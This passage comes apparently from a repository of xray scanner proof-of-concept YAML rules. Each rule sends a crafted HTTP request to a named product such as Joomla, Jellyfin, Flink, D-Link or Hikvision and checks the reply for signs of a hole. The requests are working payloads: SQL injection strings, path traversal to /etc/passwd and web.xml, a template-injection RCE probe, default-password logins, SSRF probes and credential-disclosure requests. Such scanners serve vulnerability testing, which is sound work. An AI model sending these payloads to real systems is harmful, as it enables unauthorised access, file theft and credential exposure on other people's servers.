response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.anquanke.com/vul/id/1150798 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/agent/self 10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")' 11 | expression: r0() 12 | detail: 13 | author: imlonghao(https://imlonghao.com/) 14 | links: 15 | - https://www.exploit-db.com/exploits/46073 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/consul-service-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-service-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/agent/self 10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")' 11 | expression: r0() 12 | detail: 13 | author: imlonghao(https://imlonghao.com/) 14 | links: 15 | - https://www.exploit-db.com/exploits/46074 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/coremail-cnvd-2019-16798.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coremail-cnvd-2019-16798 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("")) 12 | expression: r0() 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | links: 16 | - https://www.secpulse.com/archives/107611.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_config 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://www.seebug.org/vuldb/ssvid-91597 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/dedecms-cve-2018-6910.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/downmix.inc.php 10 | expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 11 | expression: r0() 12 | detail: 13 | author: PickledFish(https://github.com/PickledFish) 14 | links: 15 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 12 | expression: r0() 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | links: 16 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 17 | Affected Version: V5.7 sp1 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /plugin.php?id=wechat:wechat&ac=wxregister 10 | follow_redirects: false 11 | expression: response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 12 | expression: r0() 13 | detail: 14 | author: JrD 15 | links: 16 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/dlink-cve-2020-25078-account-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dlink-cve-2020-25078-account-disclosure 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /config/getuser?index=0 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") 12 | expression: r0() 13 | detail: 14 | author: kzaopa(https://github.com/kzaopa) 15 | links: 16 | - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /druid/index.html 10 | expression: response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 11 | expression: r0() 12 | detail: 13 | author: met7or 14 | links: 15 | - https://github.com/alibaba/druid 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 10 | follow_redirects: false 11 | expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 12 | expression: r0() 13 | detail: 14 | author: hanxiansheng26(https://github.com/hanxiansheng26) 15 | links: 16 | - https://xz.aliyun.com/t/2828 17 | Affected Version: duomicms<3.0 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /device.rsp?opt=user&cmd=list 10 | headers: 11 | Cookie: uid=admin 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://s.tencent.com/research/bsafe/474.html 19 | Affected Version: DVR 20 | -------------------------------------------------------------------------------- /web/pocs/xray2/e-zkeco-cnvd-2020-57264-read-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /iclock/ccccc/windows/win.ini 10 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 11 | expression: r0() 12 | detail: 13 | author: ThestaRY (https://github.com/ThestaRY7/) 14 | links: 15 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264 16 | info: E-ZKEco readfileCNVD-2020-57264 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /delete_cart_goods.php 12 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 13 | expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | expression: r0() 15 | detail: 16 | author: 凉风(http://webkiller.cn/) 17 | links: 18 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/eea-info-leak-cnvd-2021-10543.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eea-info-leak-cnvd-2021-10543 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /authenticationserverservlet 10 | expression: response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: Search?=Null 14 | links: 15 | - https://exp1orer.github.io 16 | description: MessageSolution Enterprise Email Archiving (EEA) Info Leak. 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: X.Yang 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 10 | expression: response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r(http://www.lmxspace.com/) 15 | links: 16 | - http://foreversong.cn/archives/1378 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 10 | expression: response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /admin/sql?query=SELECT%20md5({{r1}}) 12 | expression: response.body.bcontains(bytes(md5(string(r1)))) 13 | expression: r0() 14 | detail: 15 | author: PickledFish(https://github.com/PickledFish) 16 | links: 17 | - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 12 | expression: r0() 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 17 | version: <4.1.0 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /system/deviceInfo?auth=YWRtaW46MTEK 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: whwlsfb(https://github.com/whwlsfb) 15 | links: 16 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/huawei-home-gateway-hg659-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-huawei-home-gateway-hg659-fileread 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /lib///....//....//....//....//....//....//....//....//etc//passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: B1anda0(https://github.com/B1anda0) 14 | links: 15 | - https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4210 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/jboss-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jmx-console/ 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://xz.aliyun.com/t/6103 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/jellyfin-cve-2021-29490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-cve-2021-29490 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /Images/Remote?imageUrl=http://baidu.com 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("baidu.com")) 12 | expression: r0() 13 | detail: 14 | author: 曦shen 15 | links: 16 | - https://mp.weixin.qq.com/s/lZcjStsMKz-VeP-KjU2H7g 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/jellyfin-file-read-cve-2021-21402.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-file-read-cve-2021-21402 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ 10 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 11 | expression: r0() 12 | detail: 13 | author: Print1n(https://github.com/Print1n) 14 | links: 15 | - https://blog.csdn.net/qq_41503511/article/details/116274406 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/jetty-cve-2021-28164.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jetty-cve-2021-28164 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /%2e/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x) 15 | links: 16 | - https://www.linuxlz.com/aqld/2309.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /secure/QueryComponent!Default.jspa 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 12 | expression: r0() 13 | detail: 14 | author: harris2015(https://github.com/harris2015) 15 | links: 16 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) 10 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 11 | expression: r0() 12 | detail: 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 15 | -------------------------------------------------------------------------------- /web/pocs/xray2/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 12 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: 南方有梦(http://github.com/hackgov) 16 | links: 17 | - https://www.exploit-db.com/exploits/44160 18 | Affected Version: 3.0.2 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/jupyter-notebook-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /terminals/3 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 12 | expression: r0() 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 12 | expression: r0() 13 | detail: 14 | author: Aquilao(https://github.com/Aquilao) 15 | links: 16 | - https://blog.csdn.net/qq_36923426/article/details/111361158 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /app/kibana 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 12 | expression: r0() 13 | detail: 14 | author: Isaac(https://github.com/IsaacQiang) 15 | links: 16 | - https://zhuanlan.zhihu.com/p/61215662 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/kubernetes-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kubernetes-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/nodes 10 | expression: 'response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"\"kubeletVersion\": \"v") && response.body.bcontains(b"\"containerRuntimeVersion\"")' 11 | expression: r0() 12 | detail: 13 | author: mumu0215(https://github.com/mumu0215) 14 | links: 15 | - http://luckyzmj.cn/posts/15dff4d3.html 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 12 | follow_redirects: false 13 | expression: response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: hanxiansheng26(https://github.com/hanxiansheng26) 17 | links: 18 | - https://www.cnblogs.com/test404/p/7397755.html 19 | Affected Version: maccms8.x 20 | -------------------------------------------------------------------------------- /web/pocs/xray2/metinfo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-file-read 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http/.....///.....///config/config_db.php 10 | expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name") 11 | expression: r0() 12 | detail: 13 | author: amos1 14 | links: 15 | - https://www.cnblogs.com/-qing-/p/10889467.html 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 10 | follow_redirects: true 11 | expression: response.body.bcontains(b"Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 12 | expression: r0() 13 | detail: 14 | author: betta(https://github.com/betta-cyber) 15 | links: 16 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_next/../../../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 17 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 18 | version: <2.4.1 19 | -------------------------------------------------------------------------------- /web/pocs/xray2/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /../../../../../../../../windows/win.ini 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/node-red-dashboard-file-read-cve-2021-3223.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 10 | expression: response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) 11 | expression: r0() 12 | detail: 13 | author: Print1n(http://print1n.top) 14 | links: 15 | - https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg 16 | -------------------------------------------------------------------------------- /web/pocs/xray2/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/verify 10 | body: username=admin&password=123 11 | follow_redirects: true 12 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /web/pocs/xray2/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /webapi/v1/system/accountmanage/account 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 12 | expression: r0() 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://blog.csdn.net/DFMASTER/article/details/108547352 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /css_parser.php?css=css_parser.php 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 12 | expression: r0() 13 | detail: 14 | author: 2357000166(https://github.com/2357000166) 15 | links: 16 | - https://www.exploit-db.com/exploits/40211 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /getFavicon?host=baidu.com/? 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.cnvd.org.cn/patchInfo/show/192993 17 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 18 | -------------------------------------------------------------------------------- /web/pocs/xray2/panabit-gateway-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-gateway-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=panabit 11 | expression: response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm") 12 | expression: r0() 13 | detail: 14 | author: Print1n(https://github.com/Print1n) 15 | links: 16 | - https://max.book118.com/html/2017/0623/117514590.shtm 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/panabit-ixcache-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-ixcache-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=ixcache 11 | expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi") 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - http://forum.panabit.com/thread-10830-1-1.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/pbootcms-database-file-download.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pbootcms-database-file-download 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /data/pbootcms.db 10 | follow_redirects: false 11 | expression: response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS") 12 | expression: r0() 13 | detail: 14 | author: abcRosexyz(https://github.com/abcRosexyz) 15 | links: 16 | - https://www.cnblogs.com/0daybug/p/12786036.html 17 | -------------------------------------------------------------------------------- /web/pocs/xray2/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 12 | body: 13 | 